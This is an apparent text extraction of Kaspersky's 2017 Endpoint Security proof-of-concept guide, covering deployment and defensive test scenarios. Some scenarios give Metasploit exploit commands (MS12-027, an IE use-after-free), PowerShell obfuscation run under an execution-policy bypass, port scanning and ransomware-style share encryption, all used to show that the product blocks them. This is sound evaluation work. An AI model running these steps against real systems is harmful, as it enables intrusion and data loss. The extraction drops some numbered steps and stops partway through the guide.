Endpoint Security PoC Guide PDF

Kaspersky Enterprise Cybersecurity
Endpoint Security
Proof of Concept Guide
29.12.2017
Endpoint Security Proof of Concept Guide Page 1 of 78
Introduction ...................................................................................................................................................................3
Who should use this guide? ......................................................................................................................................3
What is Endpoint Security? .......................................................................................................................................3
What are the components of Endpoint Security? ......................................................................................................4
Prepare the environment ..............................................................................................................................................8
Review the requirements ...........................................................................................................................................8
Download required files .............................................................................................................................................9
Configure network ...................................................................................................................................................10
Check accounts rights and permissions ..................................................................................................................11
Setup and deploy ........................................................................................................................................................11
Kaspersky Security Center 10 .................................................................................................................................11
Kaspersky Endpoint Security 11 .............................................................................................................................22
Kaspersky Security 10 for Windows Servers ..........................................................................................................28
Kaspersky Endpoint Security 10 for Linux ...............................................................................................................33
Activation .................................................................................................................................................................38
Update .....................................................................................................................................................................38
Capability scenarios ....................................................................................................................................................38
Antimalware protection for workstations (KES) .......................................................................................................38
Antimalware protection for servers (KSWS, KESL) ................................................................................................50
Data protection for Desktops (KES) ........................................................................................................................56
Desktop controls ......................................................................................................................................................64
Conclusion ..................................................................................................................................................................73
Appendix A: POC success criteria ..............................................................................................................................74
Appendix B: Further Reading .....................................................................................................................................76
Appendix C: Ransomware emulation script ................................................................................................................77
Appendix D: AMSI demonstration scripts ...................................................................................................................78

Introduction
Who should use this guide?
This guide is built to help you quickly deploy and configure Kaspersky Endpoint Security (hereinafter KES) for
evaluation. It guides you through detailed scenarios in a proof of concept environment to help you better
understand how the solution works. The instructions provide an evaluation method to the most common use cases
for endpoint security. The target audience includes KL’s presales engineers and 3rd parties willing to evaluate KES
products.
It is assumed that reader will:
1. Possess experience in a system administration or technical reviewer role;

2. Have basic knowledge in computer networking.
What is Endpoint Security?

Kaspersky Endpoint Security solution is designed to protect physical, virtual and cloud-based endpoints (desktops
and servers) and includes the following products:
 Kaspersky Endpoint Security 11 for Windows – Endpoint protection for Windows desktops;
 Kaspersky Endpoint Security 10 for Linux – Endpoint protection for Linux desktops and servers;
 Kaspersky Security 10 for Windows Servers – Endpoint protection for Windows servers and 3rd party ICAP
capable systems;
 Kaspersky Security Center 10 – Centralized management for Endpoint Security products.

What are the components of Endpoint Security?
KSN
Kaspersky Lab Update servers
Network Kaspersky ®
Agent
Workstation Endpoint Security
 Management Agent Laptop Endpoint Security

 Updates
 KSN requests
Kaspersky ®
 Events
Security  Reporting
Center
Kaspersky ®
Network Endpoint Security

Agent Linux Server
for Linux
Agent Windows Server / Security for

3rd system Windows Servers
Figure 1. Endpoint Security components
Kaspersky Security Center
Kaspersky Security Center (KSC) is designed for centralized execution of basic administration and maintenance
tasks in an organization's network. The application provides the administrator with access to detailed information
about the organization's network security level; it lets you configure all the components of protection based on
Kaspersky Lab applications.
The components of KSC are:
 Administration server. Centralized storage of information about installed applications and management.
 Network Agent. The component coordinates the interaction between administration server and Kaspersky
Lab applications installed on a workstation or server.
 Administration Console. Microsoft Management Console (MMC) Snap-in, provides GUI interface to
manage Administration Server and Network Agent.

Kaspersky Endpoint Security 11 for Windows
Kaspersky Endpoint Security (KES) provides comprehensive computer protection against various types of
threats, network and phishing attacks. Each type of threat is handled by a dedicated component. Components can
be enabled or disabled independently of one another, and their settings can be configured.
The following features are implemented in the application:
 NEW! Integrated Endpoint Sensors component of Kaspersky Anti Targeted Attack Platform (KATA) to
provide Endpoint Detection and Response capabilities (EDR):
 IoC scanner
 Incident response tools
 Incident investigation capabilities
This feature is out of scope for this guide. For more information please contact ESIG team at
ESIG@kaspersky.com.
 NEW! System Watcher for Servers and Desktops. This component keeps a record of application activity
on the computer and provides this information to other components to ensure more effective protection of
the computer.
 NEW! Shared folders protection from remote encryption.
 NEW! Lightweight mode for Threat Protection (Cloud mode). Light antivirus databases with enabled
KSN (require less RAM and drive space)
 NEW! Application control improvements:
 Mixed mode (test mode with blocking rules)
 New KL category – Trusted certificates
 NEW! Device control improvements:
 Anti-Bridging (blocks unauthorized commuting between networks)
 Importing/Exporting the list of trusted devices (in xml format which is convenient for reading/editing
manually)
 NEW! Simplified next-gen GUI interface and various UX improvements.
 File Anti-Virus. This component protects the file system of the computer from infection. File Anti-Virus
starts together with Kaspersky Endpoint Security, continuously remains active in computer memory, and
scans all files that are opened, saved, or started on the computer and on all connected drives. File Anti-
Virus intercepts every attempt to access a file and scans the file for viruses and other threats.
 Mail Anti-Virus. This component scans incoming and outgoing email messages for viruses and other
threats.
 Web Anti-Virus. This component scans traffic that arrives on the user's computer via the HTTP and FTP
protocols, and checks whether URLs are listed as malicious or phishing web addresses.
 Firewall. This component protects data that is stored on the computer and blocks most possible threats to
the operating system while the computer is connected to the Internet or to a local area network. The
component filters all network activity according to rules of two kinds: network rules for applications and
network packet rules.
 Network Monitor. This component lets you view network activity of the computer in real time.

 Network Attack Blocker. This component inspects inbound network traffic for activity that is typical of
network attacks. Upon detecting an attempted network attack that targets your computer, Kaspersky
Endpoint Security blocks network activity from the attacking computer.
 Application Startup Control. This component keeps track of user attempts to start applications and
regulates the startup of applications.
 Host Intrusion Prevention System (HIPS) or Application Privilege Control. This component registers
the actions of applications in the operating system and regulates application activity depending on the trust
group of a particular application. A set of rules is specified for each group of applications. These rules
regulate the access of applications to user data and to resources of the operating system. Such data
includes user files (My Documents folder, cookies, user activity information) and files, folders, and registry
keys that contain settings and important information from the most frequently used applications.
 Device Control. This component lets you set flexible restrictions on access to data storage devices (such
as hard drives, removable drives, tape drives, and CD/DVD disks), data transmission equipment (such as
modems), equipment that converts information into hard copies (such as printers), or interfaces for
connecting devices to computers (such as USB, Bluetooth, and Infrared).
 Web Control. This component lets you set flexible restrictions on access to web resources for different
user groups.
Kaspersky Security 10 for Windows Servers
Kaspersky Security 10 for Windows Server (KSWS) protects servers running on Microsoft® Windows®
operating systems and network attached storages against viruses and other computer security threats to which
servers are exposed through file exchange.
You can install KSWS on the following servers:
 Terminal servers
 Print servers
 Application servers
 Domain controllers
 Servers that are protecting network attached storages
 File servers – these servers are more likely to get infected because they exchange files with user
workstations.
The application includes the following components:
 Real-Time Protection. KSWS scans objects when they are accessed.
 Server Control. KSWS monitors all attempts to access network file resources, enables Applications
Launch Control, and blocks access to the server for remote computers if they show malicious or encryption
activity.
 RPC-Network Storage Protection and ICAP-Network Storage Protection. KSWS installed on a server
under a Microsoft Windows operating system protects network attached storages against viruses and other
security threats that infiltrate the server through exchange of files.
 On-demand scan. KSWS runs a single scan of the specified area for viruses and other computer security
threats. KSWS scans server files and RAM and also startup objects.
The following functions are implemented in the application:
 Databases and software modules update. KSWS downloads updates of application databases and
modules from FTP or HTTP update servers of Kaspersky Lab, Kaspersky Security Center Administration
Server, or other update sources.

 Quarantine. KSWS quarantines probably infected objects by moving such objects from their original
location to Quarantine. For security purposes, objects are stored in Quarantine in encrypted form.
 Backup. KSWS stores encrypted copies of objects classified as Infected or Probably infected in Backup
before disinfecting or deleting them.
 Administrator and user notifications. You can configure the application to notify the administrator and
users who access the protected server about events in KSWS operation and the status of Anti-Virus
protection on the server.
 Importing and exporting settings. You can export Kaspersky Security settings to an XML configuration
file and import settings into Kaspersky Security from the configuration file. All application settings or only
settings for individual components can be saved to a configuration file.
 Applying templates. You can manually configure the security settings of a node in the server file
resources tree and save the values of the configured settings to a template. This template can then be
used to configure the security settings of other nodes in Kaspersky Security protection and scan tasks.
 Writing events to the event log. KSWS logs information about the settings of application components, the
current status of tasks, events that occurred during their run, events associated with KSWS management,
and information required for failure diagnostics in the KSWS operation.
 Hierarchical storage. Kaspersky Security can operate in hierarchical storage management mode (HSM
systems). HSM systems allow data relocation between fast local drives and slow long-term data storage
devices.
 Trusted zone. You can create a list of exclusions for protection scope or scan scope which KSWS applies
to On-Demand Scan, Real-Time File Protection, Script Monitoring, and RPC-Network Storage Protection.
 Managing permissions. You can configure the rights of managing KSWS and the rights of managing
Windows services that are registered by the application, for users and groups of users.
Kaspersky Endpoint Security 10 for Linux
Kaspersky Endpoint Security 10 for Linux (KESL) protects computers running Linux® operating systems
against malware. Threats can infiltrate the system via network data transfer channels or from removable drives.
The application allows to:
 Scan file system objects located on the computer's local drives, as well as mounted and shared resources
accessed via the SMB and NFS protocols. The application can scan file system objects both in real time
using real-time protection tasks and on demand using on-demand scan tasks.
 Scan boot sectors using the boot sector scan task.
 Scan process memory using the process memory scan task.
 Detect infected objects. If an object is found to contain code from a known virus, KESL considers the object
as infected.
 Neutralize threats detected in files. Depending on the type of threat, the application automatically chooses
the action to be performed in order to neutralize the threat.
 Save backup copies of files before disinfection or deletion and restore files from backup copies.
 Manage tasks and configure their settings. You can manage the real-time protection task, on-demand scan
task, boot sector scan task, process memory scan task, update task, update rollback task, and update
distribution task.

 Add keys, activate the application using activation codes, and use the application based on a subscription.
 Notify the administrator about events occurring during the operation of KESL.
 Update KESL databases from Kaspersky Lab update servers, via the Administration Server, or from a
user-specified source by schedule or on demand. The application uses anti-virus databases to detect and
disinfect infected files. KESL analyzes each file for threats during the scan process: file code is matched
against code that resembles a particular threat.
 Manage KESL using the following methods:

o From the command line using the application control commands
o Via Kaspersky Security Center
Prepare the environment

Review the requirements
Hardware requirements
Table 1. Endpoint Security hardware requirements
Kaspersky Kaspersky Endpoint Kaspersky Security 10 Kaspersky Endpoint Network

Security Center Security 11 for Windows Servers Security 10 for Linux Agent
CPU, GHz 1,4 TBA 2,4 X 4 core 1,86 1,4
RAM, GB 4 TBA 2 2 0,5
HDD, GB 10 TBA 4 1 1
Please note that RAM and CPU requirements of the Network Agent, Administration Server and Administration
Console are the minimum requirements for installation of these components. It is recommended that you use
computers with a larger amount of RAM and a greater CPU frequency.
Kaspersky Endpoint Security 10 for Linux requires swap partition to be at least 1 GB
Software requirements
Kaspersky Security Center 10

List of supported OS for Administration Server, Administration Console and Network Agent available at
https://support.kaspersky.com/ksc10#requirements
Linux OS:
The glibc.i686 module must be installed to Red Hat® Enterprise Linux® 7 or later, CentOS 7 or later, and
Oracle Linux 7 or later prior to installing Network Agent.
The glibc-32bit module must be installed to 64-bit versions of openSUSE® 42.2 and SUSE® Linux Enterprise
Server 12 prior to installing Network Agent.

The libc6-i386 module must be installed to 64-bit versions of Debian and Ubuntu prior to installing Network
Agent.

List of system requirements for Kaspersky Endpoint Security 11 will be available in Q1 2018 and added to this
document. So far please use the requirements for Kaspersky Endpoint Security 10:
https://support.kaspersky.com/kes10wks#requirements
Kaspersky Security 10 for Windows Server
Before installing Kaspersky Security 10 for Windows Servers, remove third-party antivirus software from the
server. Kaspersky Security 10 for Windows Servers can be installed on top of Kaspersky Anti-Virus 8.0 for
Windows Servers Enterprise Edition
For installation and correct operation of KSWS, Microsoft Windows Installer 3.1 must be installed on the
server.
System requirements: https://support.kaspersky.com/kes10wks#requirements

System requirements: https://support.kaspersky.com/kes10linux#requirements
Download required files

Kaspersky Security Center
Application distributive (beta): ksc_10sp3_10.5.1529_full_en.exe
Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379114-general-

information/
The link for distributive of KES 11 will be available in Q1 2018 and added to this document. So far please use files
for Kaspersky Endpoint Security 11 beta:
KES 11 installer (AES256 encryption, beta)
The installer contains encryption tools which use the AES cryptographic algorithm with the effective key length
of 256 bit. The installer must be downloaded and used in accordance with local legislation.
Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379106-general-

information/
Kaspersky Security 10 for Windows Server
Application distributive: ks4ws_10.0.0.486_en.exe
KSC management plugin: klcfginst.exe

Application distributive for Linux (deb) x64: kesl_10.0.0-3458_amd64.deb
Application distributive for Linux (deb) x86: kesl_10.0.0-3458_i386.deb
Application distributive for Linux (rpm) x64: kesl-10.0.0-3458.x86_64.rpm
Application distributive for Linux (rpm) x86: kesl-10.0.0-3458.i386.rpm
Network agent for Linux (deb): klnagent_10.1.1-26_i386.deb
Network agent for Linux (rpm): klnagent-10.1.1-26.i386.rpm
KSC management plugin: klcfginst.msi (requires Visual C++ 2015 Redistributable to be installed on the
administration server).
Files for remote installation via KSC: kesl.zip
Configure network
To be able to use all the features of Endpoint Security described in this guide, make sure the following ports are
open on the hosts:
Please note that this is the list of ports necessary to be open for the POC purposes only. For the full list of
required ports navigate through the link: https://support.kaspersky.com/9297#block1
Port number Protocol Description
Computer hosting the Administration Server
13000 TCP Required for:

 Receiving data from client computers
 Connecting Update agents
 Connecting slave Administration Servers using the secure SSL
connection
13000 UDP Required for reporting on computers' shutdown.
13111 TCP Required for connecting to the KSN proxy server.
13291 TCP Required for the SSL connection between the Administration Console and the
Administration Server.
14000 TCP Required for:

 Receiving data from client computers
 Connecting Update agents
 Connecting slave KSC servers without using the SSL connection
17000 TCP Required for secure SSL connection to the activation proxy server.
Endpoint without Network Agent installed
445 TCP Required for remote installation of Network Agent

Client computer with the Network Agent installed
15000 UDP Used for receiving a request for connection to the Administration Server, which
allows receiving the information about the computer in the real-time mode.
Check accounts rights and permissions

To install KSC and/or Network Agent, you must have Administrator permissions on the computer on which you are
installing the product.
If you do not plan to install KESL via KSC and Network Agent, you must have root privileges on the computer on
which you are installing the product.
Table 2. Privileges required for installation
KSC Network Agent KESL KES KSWS
Local installation Local administrator Local administrator root Administrator Local administrator
Remote
N/A Local administrator − − Local administrator
installation
If you plan on using a different user account as a default account for running the services of Kaspersky
Security Center, you must add it to the KLAdmins group after installing the product.
Setup and deploy

This chapter describes the installation process of each component of Endpoint security.

Since KSC consist of several components the installation process is divided in two steps:
1. Install Administration server and Administration Console

2. Deploy Network agent on Windows or Linux workstations.
Administration server
This section shows the installation of Administration Server component.

1. Run ksc_10sp3_10.5.1529_full_en.exe file. You

will see the following window.
Select Install Kaspersky Security Center 10.
2. If the .NET Framework is already installed in the

system you will see the following windows.
Otherwise you will be asked to install missing
feature.
Proceed to the next step.
3. Accept the EULA and proceed.

4. Select the installation type. It is recommended to

choose Custom type.
Proceed to the next step.
5. Select components to install.
6. Specify an infrastructure size.

7. Specify the user account to start the

Administration Server service.
8. Specify an account for Kaspersky Security center

10 services.
9. Select the database server type.

10. Specify MS SQL Server parameters.
11. Choose authentication mode.
12. Specify shared folder to be created.

13. Specify the Administration Server connection

settings.
14. Specify the Administration Server address.
15. Pick the plugins to install.

16. Proceed with the installation process.
17. Wait until the installation completes.
Congratulations! You have install the Administration Server and Administration Console.
On the first run of Administration Console after the installation of the Administration server you will be prompted to
add a license key for Kaspersky Security Center and create or import the policies for the applications. You can
proceed with the wizards or cancel these steps.
Please note this steps could be slightly updated when KES 11 release will be available in Q1 2018.
Network agent for Windows
Network Agent (Kaspersky Security Center Administration Agent) can be installed locally or remotely by means of
KSC. This section shows the remote installation of a network agent.

1. In KSC expand Advanced then Remote

installation and Installation packages section.
Find Kaspersky Security Center 10 Network

Agent and right click on it.
From drop-down menu select Install application

option.
Remote installation task creation wizard will

start.
2. Specify devices for installation selection type.
Install on group of managed devices will

create a group task.
Select devices for installation type will create

a task for device selection.
In this example second type is used.

3. Select devices for installation.
By default network polling is performed right

after the Administration Server installation.
If you don’t see the target device in this list you

can choose it manually by specifying IP address
or FQDN of the target device by clicking Add
button.
4. Specify remote installation task settings

5. Specify the actions to perform after the

installation finishes.
6. Specify an administration group where the

devices will be placed after the installation if
needed.

7. Specify the account to access the devices.
8. Start the installation process by clicking Next on

this step.
9. Close the task creation wizard by clicking Finish.

The task will start.
After the task completes you will have network agents installed on the target devices.

Network agent for Linux
At the moment, KSC doesn’t support remote installation of Network Agent on Linux OS. However, it is possible to
do if SSH daemon is up and running on the target VMs.
To perform remote installation via SSH you will be needed the Putty utilities package to be installed on the KSC
server.
Create the .bat script, for example install.bat and paste the following content in it:
set COMP=[target computer IP address]
set PW=[password for root]
"C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "wget -P /home/root
http://[ksc_ip_address]:8060/Public/klnagent-10.1.1-18.i386.rpm"
"C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "wget -P /home/root
http://[ksc_ip_address]:8060/Public/answer.txt"
"C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP% "rpm -i /home/root/klnagent-
10.1.1-18.i386.rpm"
"C:\Program Files\PuTTY\plink.exe" -pw %PW% root@%COMP%
"/opt/kaspersky/klnagent/lib/bin/setup/postinstall.pl < /home/root/answer.txt"
In this document plink.exe utility is used for remote command execution (ssh client analog for Windows). To be able
to carry out commands on a remote PC the utility needs a user account (root in this case), its password (-pw flag)
and the target host name or IP address (COMP variable).
To deploy network agent on several VMs you have to modify script to include FOR loop statement and go through
the list of VMs.
Optionally you can configure password-less SSH access to VMs using public key authentication in order to avoid
password specification in the script.
The first two commands start the wget utility on the target machine which downloads the necessary files from KSC
web-server to the /home/user folder (-P flag). After this, Network Agent is installed.
Right after the installation, the post-install script starts and is provided with answers from answer file (answer.txt):
ksc.testlab.local
14000
13000
Y
1
Each line of this file contains the information requested by the Network Agent setup script:
1. Administration server address

2. The port used for connecting to the administration server
3. SSL-port used for connecting to the Administration server
4. Consent to use SSL for connecting to the administration server
5. Connection gateway mode (1 means not to use CG)
After the Network Agent is installed move the computer to the Managed computers administration group.
Kaspersky Endpoint Security 11

As well as the Network Agent KES can be installed locally using installation wizard or remotely by means of KSC.
This section describes the remote installation using remote installation task. First you will create an installation
package, then proceed with the task.


Click Create installation packages button.
2. Select Create installation package for

Kaspersky Lab application.
3. Define a name of the package.
4. Specify distribution package.
Click Browse and point the kes_win.kud file.
5. Accept the EULA.

6. Wait until the package will be uploaded to the

7. Specify remote application installation settings.
8. Finish the package creation wizard.
9. Open package properties and enable Data

Encryption components for installation.

10. Right click on the newly created package and

select Install application from context menu.


12. Pick devices for installation.

13. On this step you can add a license key.
You can skip this step by selecting Automatic

distribution and clicking Next button.
14. If you skip adding the key you will see the
following warning.
Click Yes to proceed.


16. Specify whether to uninstall incompatible third

party applications during the installation or not.
17. If necessary specify an account under which

perform the installation.
If the Network Agent is already installed select

first option.


this step.
19. Close the task creation wizard by clicking Finish.

The task will start.

KSWS can be installed locally using installation wizard or remotely by means of KSC.
This chapter describes the remote installation using remote installation task. First you will create an installation
package, then proceed with the task.
If you didn’t select application management plugin to be installed during the Administration Server installation,
please install it. To do it run klcfginst.exe that is located within the application distributive.



3. Define package name.
Click Browse and point the ks4ws.kud file.

The default file location is [Drive
letter]:\ks4ws\10.0.0.486\english\server
5. Accept the EULA.
6. Wait until the package will be uploaded to the


8. Open package properties and change the set of

components if necessary.
9. Right cling on the newly created package and

select Install application from the context
menu.



11. Pick devices for installation.
12. Define remote installation task settings.

13. If you have an appropriate key in KSC license

container you can select it on this step.
Or you can add a new key here.


15. If necessary specify an account under which

perform the installation.
If the Network Agent is already installed select

first option.

this step.
17. Finish the task creation wizard.
Congratulations! Now you have KSWS 10 installed on the target devices.
In order to be able to manage the application remotely you have to create application security policy. If there is
no policy created, create one with default parameters.
Before installation you need to disable SELinux or AppArmor:
Ubuntu: https://help.ubuntu.com/community/AppArmor#Disable_AppArmor_framework
Debian: https://wiki.debian.org/AppArmor/HowToUse

CentOS/RHEL: https://wiki.centos.org/HowTos/SELinux#head-430e52f7f8a7b41ad5fc42a2f95d3e495d13d348
1. Extract remote installation files. Place kesl-

10.0.0-3458.x86_64.rpm to the folder where
remote installation files were extracted.



4. Define package name.
Click Browse and point the kesl.kud file.
6. Accept the EULA

8. Right click on the newly created package and

select Install application from the context
menu.


10. Pick devices for the installation.


12. If you have an appropriate key in KSC license

container you can select it on this step.
13. Or you can add a new key here.
14. Finish the task creation wizard.
Congratulations! Now you have KESL installed on the target devices.

Activation
You can activate application within the deployment process. If you didn’t do this you can add a license key later
with an activation task. For each application described in this guide the task name slightly differs. For KES for
Windows and KES for Linux the task’s name is Add key and for the KSWS the task name is Activation of
Application.
Update
After the installation of Endpoint Security applications (KES 11 for Windows, KES 10 for Linux and KSWS 10) you
must create the update tasks for each application and do bases update in order to ensure the use of the latest
bases and signatures.
Capability scenarios
The following scenarios are designed to help you experience the key features of Endpoint Security. They highlight
the most important new functionality and take you through how you can use these features in your own case. You
can go through them in order or start with the one that is interested for you at most. They can be demonstrated in
any order at any time.
The steps included in «Setup and deploy» section are mandatory to proceed with this scenarios:
1. Anti-malware protection for workstations (KES)

a. Malware advanced detection (AMSI)
b. Exploits prevention
c. Web threats protection
d. Anti-Bridging
e. Network Threats Protection
2. Anti-malware protection for servers (KSWS, KESL)
a. Anti-ransomware
b. KSWS integration with 3rd party system (ICAP)
c. Linux server protection
3. Data protection for desktops (KES)
a. Full Disk Encryption
b. Removable drives file level encryption with portable mode
c. BitLocker management
4. Desktop controls (KES)
a. Web control
b. Device Control
c. Application startup control
Antimalware protection for workstations (KES)

Malware advanced detection (AMSI)
The Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to
integrate with any antimalware product present on a machine. It provides enhanced malware protection for users
and their data, applications, and workloads.
AMSI is antimalware vendor agnostic, designed to allow for the most common malware scanning and protection
techniques provided by today's antimalware products that can be integrated into applications. It supports a calling

structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other
techniques (source: https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx)
KES 11 supports AMSI. In this scenario you will see how KES uses AMSI to detect malware in obfuscated
PowerShell scripts.
Evaluation steps:
1. Download obfuscation tools

2. Create a sample script
3. Obfuscate the script and execute it.
4. Check the results.
Expected results:
Get the following message in PowerShell:

This script contains malicious content and has been blocked by your antivirus software. Test succeeded.
Instructions:
1. Download script obfuscation tools: https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip

Extract the archive.
2. Create two PowerShell scripts:

bsstest_amsi.ps1 and obfuscate_bsstest_amsi.ps1
(see Appendix D)
3. Place the scripts to the obfuscation tools folder.
4. Run command prompt with administrator privileges.
5. Execute the following command:

powershell -executionPolicy bypass -file obfuscate_bsstest_amsi.ps1
You will get the bsstest_amsi_obf.ps1 file.
6. Right click bsstest_amsi_obf.ps1 file and select

Edit from context menu.
7. Ensure that the file content is obfuscated.

8. Execute the following command:

powershell -executionPolicy bypass -file bsstest_amsi_obf.ps1
You have shown how the script execution is intercepted with AMSI and a malicious action is prevented by KES 11.
Exploits prevention
This scenario shows the exploit prevention capabilities of Kaspersky Endpoint Security 11. The scenario requires
specific environment which is described below. During this scenario you will use Metasploit framework in order to
try to exploit two different vulnerabilities using the following modules:
1. MS12-027 MSCOMCTL ActiveX Buffer Overflow

2. MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
Environment description:
OS:
 Windows 7 SP1 x86 (32-bit, build 7601)
Installed applications:
 JRE 1.6
 MS Office 2007
 Metasploit framework (https://windows.metasploit.com/metasploitframework-latest.msi)
Evaluation steps:
1. Prepare environment
2. Disable file threat protection
3. Install Metasploit framework
4. Exploit Vulnerabilities
5. Check the results
Expected results:
The vulnerability exploitation is blocked by Exploit prevention component.
Instructions:

1. Disable File Antimalware in the policy.
2. Download and install Metasploit framework.
3. Check, that exploit prevention is enabled in the

policy.
4. Open Metasploit console.

5. Execute command:
use
exploit/windows/fileformat/ms12_027
_mscomctl_bof
6. Execute command:
set payload windows/exec
7. Execute command:
set cmd calc.exe
8. Execute command:
run

9. The msf.doc file will be created in

C:\Users\[current user]\.msf\local
Open this file. File opening will be blocked.
10. In KES11 logs you will see a corresponding

event.
11. Check the event in KSC.

12. Now go back to the msfconsole and execute the

following command:
use
exploit/windows/browser/ie_cgeneric
element_uaf
13. Execute command:
set payload windows/exec
set cmd calc.exe
run
In the console you will get a link like:

http://[IP address]:8080/gp8JUR7
16. Navigate through the link.

17. Check the results in local event log…
18. … and in KSC console.
Congratulations! You have just shown how KES 11 prevents the exploitation of vulnerabilities.
Web threats protection
Web threat protection component ensures you that the workstation is protected from different web threats including
malicious web-resources, malware and ransomware. In order to ensure that “Web threat protection” component is
enabled test phishing page will be tried to access from a web browser. As a result a banner with an alert will be
shown in the browser’s window.
Evaluation steps:
1. Enable Web threat protection component

2. Access the malicious web-page (test page in this case)
3. Review event log
Expected results:
The access to a malicious web-page is blocked by Web threat protection component.
Instructions:

1. Enable Web Threat Protection in the policy.
2. On the protected machine open web browser and

try to access the following page:
http://www.kaspersky.com/test/wmuf
or
http://malware.wicar.org/data/vlc_amv.html
Please note that the protocol must be HTTP,

not HTTPS.
You will get the following banner in the browser

window.
Anti-Bridging
Anti-bridging feature in KES 11 denies the use of a network interface in case there is another active network
interface presents in the system. Thus you cannot create network bridge between enabled and disabled interfaces.
This scenario shows how to enable anti-bridging feature and how it affects the system. In this how to, you will see
how to deny the use of second Ethernet connection.
Evaluation steps:
1. Enable 2 network interfaces of the same type on the protected device.

2. Enable the Anti-Bridging feature
3. Check the results
Expected results:
The use of second network interface is denied by Anti-Bridging feature. One of the network interfaces becomes
disabled after enabling the feature.
Instructions:

1. Check that you have multiple network interfaces

enabled.
2. Open policy properties, and navigate to Device

Control section.
Then click Anti-Bridging button.
3. In the Anti-Bridging properties window tick the

checkbox that enables the feature and select the
interfaces types that will be affected.
Save the policy.
4. Once the policy will be applied, one of the

network interfaces becomes disabled.
5. The active user will see the following notification.

6. If you try to enable the disabled interface the

other one will become disabled right after this.
Now you have anti-bridging enabled and configured and the user or local administrator will not be able to create a
network bridge.
Network Threats Protection
This scenario demonstrates how Network Threats Protection component works and how it is configured.
Evaluation steps:
1. Ensure that Network threat protection component is enabled

2. Download and install nmap network mapper to the “attacker” computer
3. Perform port scanning of the protected system
4. Check the event log
Expected results:
The Network Threat Protection component detects the port scanning.
Instructions:
1. Open policy properties and switch to the

Network Threat Protection section.
Ensure that the component is enabled.

2. On the “attacker” computer run Zenmap and

perform quick port scanning of the target
computer.
Specify target IP address in the Target field.
Select Quick scan as the profile.
Click Scan to start scanning.
3. The Network threat protection component will

detect the network port scanning and alert the
administrator.
Check the events in KSC.
4. Detailed view.

Antimalware protection for servers (KSWS, KESL)

Anti-Ransomware
Ransomware is one of the top threats that customers are most concerned nowadays. In this scenario servers are
protected with KSWS10 and crypto locker software is going to be executed from the remote host in order to encrypt
valuable documents in a network share.
To protect from these threats, you will configure Anti-Cryptor and Untrusted Host blocking features of KSWS10.
Evaluation steps:
1. Create network shared folder with write permissions to everyone on the protected folder and fill it with some data
(documents).
2. Map the network share as a network drive to the attacker computer.
3. Encrypt files in the share from the remote host.
4. Enable Anti-Cryptor and Untrusted Host blocking features on the protected server.
5. Try to encrypt files in the network share.
Expected results:
The encryption of the files in the network share is detected by KSWS and the access to the share is blocked for the
remote host.
Instructions:
1. Create shared folder on protected server
2. Fill the folder with some content, create a

backup copies of the content.
3. Connect the shared folder to the client computer

as a network drive (i.e. Z:)

4. Run encryption script on the client computer
(see Appendix for the script file)
5. Notice that the files in the shared folder were

encrypted with AESCrypt utility
6. Restore encrypted files from backup
7. Open policy properties, switch to Server Control

section.

8. In the Anti-Cryptor settings specify the shared

folder in the protection scope
9. Enable task Anti-Cryptor
10. Open Untrusted host blocking settings

11. Enable Untrusted host blocking
12. Run the encryption script

Notice the error message in the console
13. Check the events in KSC

Encryption activity was detected
14. And the malicious host was added to untrusted

hosts list.

Congratulations! You have successfully protected network shared folders on the server from ransomware.
Untrusted hosts were blocked for specified time.
KSWS integration with 3rd party system (ICAP)
The scenario shows how KSWS can be integrated with proxy server, SQUID in this case. The proxy server will
send the objects for scanning to KSWS via ICAP. Depending on the KSWS verdict proxy server will allow or block
access to the object.
For this feature to be available you have to have Kaspersky Security for storages license.
Evaluation steps:
1. Configure KSWS to accept requests via ICAP

2. Configure SQUID proxy server to send the objects for scanning to KSWS
3. Try to download EICAR test file from the Internet.
Expected results:
The download of EICAR test virus file is blocked.
Instructions:
1. Open KSWS policy properties.
Go to Network Attached Storage Protection

section and open ICAP-Network Storage
Protection settings.
2. Check the settings.
The default settings are enough for this

demonstration.
Change settings if necessary.

3. Switch to the Task management tab and enable

the task.
4. Add the following strings to squid.conf file:
icap_enable on
icap_service service_resp respmod_precache

bypass=0 icap://[KSWS IP Address]:1344/avscan
adaptation_access service_resp allow all
Restart Squid proxy server.
5. Navigate through this link in the web browser that

is configured to use squid proxy server:
http://www.eicar.org/download/eicar.com
You should get the following warning from KSWS

(see screenshot).
6. Check the event in KSC console.
The download of EICAR test-virus file has been blocked by KSWS.
Linux server protection
Evaluation steps:

1. Download EICAR test file from the Internet

2. Check the event log
Expected results:
The EICAR test virus file will deleted right after downloading by Real-time protection.
Instructions:
1. Download EICAR test virus using the following

command:
wget -P ~/ http://www.eicar.org/download/eicar.com
2. Check events in KSC
Data protection for Desktops (KES)

Full Disk Encryption
Full disk encryption feature protects data from being accessed by unauthorized persons in case a laptop or a hard
drive are stolen. This scenario shows how to configure full drive encryption with Kaspersky Disk Encryption
technology in KES 11.
Evaluation steps:
1. Configure and apply encryption policy.

2. Wait until the encryption process starts.
Expected results:
A hard drive is encrypted.
Instructions:

1. Open KES 11 policy properties in KSC and

switch to Full Disk Encryption section.
Select Kaspersky Disk Encryption as

encryption technology and change the
encryption mode to Encrypt all hard drives.
Save and apply the policy.
2. In KSC console add additional column to be able

to see encryption status.
Click Add/Remove columns link.
3. Tick Encryption status checkbox and close the

window by clicking OK.

4. Double click on the device that falls under the

policy.
Switch to Events section.
Note that computer requires restart after the

policy has been applied.
5. You can see it in the Encryption status column

also.
6. Restart the target computer.
During the system restart the Authentication

agent will run in test mode in order to ensure the
hardware compatibility.
7. After reboot is completed the Encryption status

of a computer will change to Applying policy.
It means that the encryption process has been

started.

8. To see more details on the encryption process

double click on the device to open its properties.
Switch to Applications section. Select

Kaspersky Endpoint Security for Windows
application and click Statistics button.
9. Scroll down to check the encryption status.
10. The encryption process goes in background and

is fully transparent to a user.
It is not necessary to wait until the drive will be

encrypted to 100%.
If user performs a system reboot he will see the

Authentication agent before the OS boot.
